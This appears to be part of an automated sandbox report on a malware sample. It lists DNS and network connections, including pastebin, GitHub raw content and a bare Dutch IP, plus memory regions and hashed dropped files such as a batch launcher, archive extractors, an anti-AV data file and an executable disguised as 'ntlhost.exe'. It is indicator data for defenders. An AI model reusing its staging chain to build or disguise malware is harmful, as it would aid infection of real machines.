US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 140.82.113.3:443 github.com tcp
US 140.82.113.3:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 3.113.82.140.in-addr.arpa udp
NL 185.209.161.189:80 185.209.161.189 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 189.161.209.185.in-addr.arpa udp
NL 2.22.54.122:443 www.bing.com tcp
NL 2.22.54.122:443 www.bing.com tcp
US 8.8.8.8:53 122.54.22.2.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/4828-134-0x00007FFE602B0000-0x00007FFE602B2000-memory.dmp

memory/4828-135-0x00007FF6AAEB0000-0x00007FF6AE22C000-memory.dmp

memory/2300-139-0x000001C1EA210000-0x000001C1EA232000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilcnrcqt.0wj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2300-149-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/2300-150-0x000001C1E9950000-0x000001C1E9960000-memory.dmp

memory/2300-151-0x000001C1E9950000-0x000001C1E9960000-memory.dmp

memory/2300-152-0x000001C1E9950000-0x000001C1E9960000-memory.dmp

memory/2300-155-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4616-166-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/4616-167-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1bad2704664b4c1a190586ec492be65f
SHA1 1c98e6645c66774152c184d23f7a3178ce522e7b
SHA256 5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e
SHA512 668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

memory/4616-168-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-170-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-171-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/4616-172-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-173-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-175-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/3836-176-0x0000000000400000-0x0000000000464000-memory.dmp

memory/3836-178-0x0000000000400000-0x0000000000464000-memory.dmp

memory/3064-179-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/3064-180-0x000001CA62880000-0x000001CA62890000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fc28168b916bf9744961653d503e1164
SHA1 71deadab13b81a414582f931e9af010152463644
SHA256 a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9
SHA512 08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

memory/3064-191-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/3064-192-0x000001CA62880000-0x000001CA62890000-memory.dmp

memory/3064-193-0x000001CA62880000-0x000001CA62890000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe

MD5 6736c0e1179296ff6dfa0191ac874c7a
SHA1 89566e42fb866eecf5e8282b967461299ab7a08c
SHA256 c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA512 85791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c

C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe

MD5 6736c0e1179296ff6dfa0191ac874c7a
SHA1 89566e42fb866eecf5e8282b967461299ab7a08c
SHA256 c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA512 85791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 7f4c4965a2f78d6de87d304fdd355abf
SHA1 87a05c16753a036126677fe53118c07d36c0e671
SHA256 ed489607187114988306637dae2b81eff225315a8a8ee221249d14430f264fdb
SHA512 41c949862477065b8f537670b6747074c9e543753812fcb28b02be12b1bbf0fb8b9473ea0859fb1450fee848d62d4c70249d09f48a5e5eac15eb510b70b3f741

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 7cebec977eb671d25c4160ee75cbf124
SHA1 e09e0e906834b7f2ec270ba589a01e455ebdf0d1
SHA256 f0e78c63d52116f121709480935013c26a99bd85ba6bfd5100bc5e4411c7178e
SHA512 b79c8d6d4c947fdee755ef81c5c36d657ca1b4030c8f90f906961a22968c98d8fb6e33302191c28135c2593598876b6921f766270a50063754927b4404c798d1

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 270d4612657b69eda3ebbb1207fc8cd7
SHA1 e023ff99c13c056fa7f80b55dc12f1d02df92114
SHA256 83b0eb7eee4c982f034d53b7541758fac699956433baeedf9b8f4494e367b5e7
SHA512 6fe46a7dd1fc6930646e3ba08306e1cfe826dcba6b7e3af1c9439157f35919739940e1d8143c6abecfa83f6b92d324764dfa8ca54dca91250b849c2cd138e6fe

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 018ccdb718d3ad7641fecfdad0fbeb4e
SHA1 46cdffdea8e44b455873659a35dcd973364a84dd
SHA256 708b3379e029aafb112f890a6ae10f2a4eebe52eef991d2d6136a11fe84143b5
SHA512 dcd1494429ced81dfbcc83cb8c87d4cd42719d53918834e16691c0d068631ae39fe0381c668e92341a5cdccf75877c2af3ae81c66b6d37e4b149f68a06ab2803

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 4762f0b6652250641a06e2029d6dda23
SHA1 bfa7925486f951f729b3ce47caa6ff52330420ad
SHA256 1e9654f0b077cfb8c393cb6cfd3d2b7918d87d56eaaf14f8523a582343d13b4e
SHA512 33227e64cc34f7e591f6a26b6eaef2f2b4369050e5a2c544413b8f8264114083a93fa70911810c19390ed3d1724bd73c135a2acf11f12f70892f20609593c72d

C:\Users\Admin\AppData\Local\Temp\main\extracted\4.exe

MD5 a761e93d5993567d382af163745760ad
SHA1 27bd150490cd443a60bb70fa8b83299d75e02779
SHA256 1edbffa93edd8b72a352aec6bbf6cd36b1045b26b8dfa141b10067aaddc8d6e1
SHA512 c9e4d46a747e02b7f387d6551f2d26ce847e66a69b8a8bddb276a83388b367f2fa28153402d5f274a81fcc260840afc043c4b853dd06d87125980a49934f14fa

C:\Users\Admin\AppData\Local\Temp\main\4.exe

MD5 a761e93d5993567d382af163745760ad
SHA1 27bd150490cd443a60bb70fa8b83299d75e02779
SHA256 1edbffa93edd8b72a352aec6bbf6cd36b1045b26b8dfa141b10067aaddc8d6e1
SHA512 c9e4d46a747e02b7f387d6551f2d26ce847e66a69b8a8bddb276a83388b367f2fa28153402d5f274a81fcc260840afc043c4b853dd06d87125980a49934f14fa

memory/2852-239-0x0000000000B60000-0x0000000000B6C000-memory.dmp

memory/2852-240-0x0000000073600000-0x0000000073DB0000-memory.dmp

memory/2852-241-0x0000000005970000-0x0000000005F14000-memory.dmp

memory/2852-243-0x0000000005460000-0x00000000054F2000-memory.dmp

memory/2852-244-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/2852-245-0x0000000005430000-0x000000000543A000-memory.dmp

memory/2852-246-0x00000000056B0000-0x0000000005716000-memory.dmp

memory/4132-247-0x0000000003050000-0x0000000003086000-memory.dmp

memory/4132-248-0x0000000073600000-0x0000000073DB0000-memory.dmp

memory/4132-249-0x00000000031E0000-0x00000000031F0000-memory.dmp

memory/4132-250-0x00000000031E0000-0x00000000031F0000-memory.dmp

memory/4132-251-0x0000000005850000-0x0000000005E78000-memory.dmp

memory/4132-252-0x0000000005E80000-0x0000000005EA2000-memory.dmp

memory/4132-253-0x0000000005F20000-0x0000000005F86000-memory.dmp

memory/4132-263-0x0000000006620000-0x000000000663E000-memory.dmp

memory/4132-264-0x00000000031E0000-0x00000000031F0000-memory.dmp

memory/4132-269-0x000000006FED0000-0x000000006FF1C000-memory.dmp

memory/2852-280-0x0000000073600000-0x0000000073DB0000-memory.dmp

memory/4132-281-0x000000007F480000-0x000000007F490000-memory.dmp

memory/4132-279-0x0000000006BD0000-0x0000000006BEE000-memory.dmp

memory/4132-268-0x0000000006C30000-0x0000000006C62000-memory.dmp

memory/4132-282-0x0000000007F90000-0x000000000860A000-memory.dmp

memory/4132-283-0x0000000007930000-0x000000000794A000-memory.dmp

memory/4132-285-0x00000000079A0000-0x00000000079AA000-memory.dmp

memory/4132-287-0x0000000007BC0000-0x0000000007C56000-memory.dmp

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 094987ceeda8953af67c8f5b0c7179ba
SHA1 f03cf12f669e6a79cc614669f41e51de77cfc290
SHA256 d6868f311d61c1d5e09468effe5842c47c45524e06f6c8d0e3e79960986c9b02
SHA512 7a0d7ff99bb2b893959ea4332901334fe89a490c6cb1ebbe7ee0ed25f1bdd6398a667099d8e8fa572b7aa7b88bdd9114e1b2513ab8122bccc4e53d2704d05622

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 e4155d52bb04a3e272b7fc644329b9b3
SHA1 737f31d70a25a552c47d214685f18c66326e7865
SHA256 7d0ddb4d7fc1dcb59b726e62a0b96c468d836e4ba5a0d2dfabf005d2a0ee293a
SHA512 689d1833032ab05f92eb7929dbb7ac68b584fb46a28e3b690d5ea9cedde48c1064d8a81de5a1a1e3bb022e93ec314227174ef1cdcc8fb86d02679a716f31e34c

memory/2852-292-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/4132-293-0x0000000007B70000-0x0000000007B7E000-memory.dmp

memory/4132-295-0x0000000073600000-0x0000000073DB0000-memory.dmp

memory/4132-294-0x0000000007CA0000-0x0000000007CBA000-memory.dmp

memory/4132-296-0x00000000053E0000-0x00000000053E8000-memory.dmp

memory/4132-297-0x00000000031E0000-0x00000000031F0000-memory.dmp

memory/4132-298-0x00000000031E0000-0x00000000031F0000-memory.dmp

memory/2852-300-0x0000000073600000-0x0000000073DB0000-memory.dmp

memory/4132-302-0x00000000031E0000-0x00000000031F0000-memory.dmp

memory/4132-303-0x000000007F480000-0x000000007F490000-memory.dmp

memory/4132-306-0x0000000073600000-0x0000000073DB0000-memory.dmp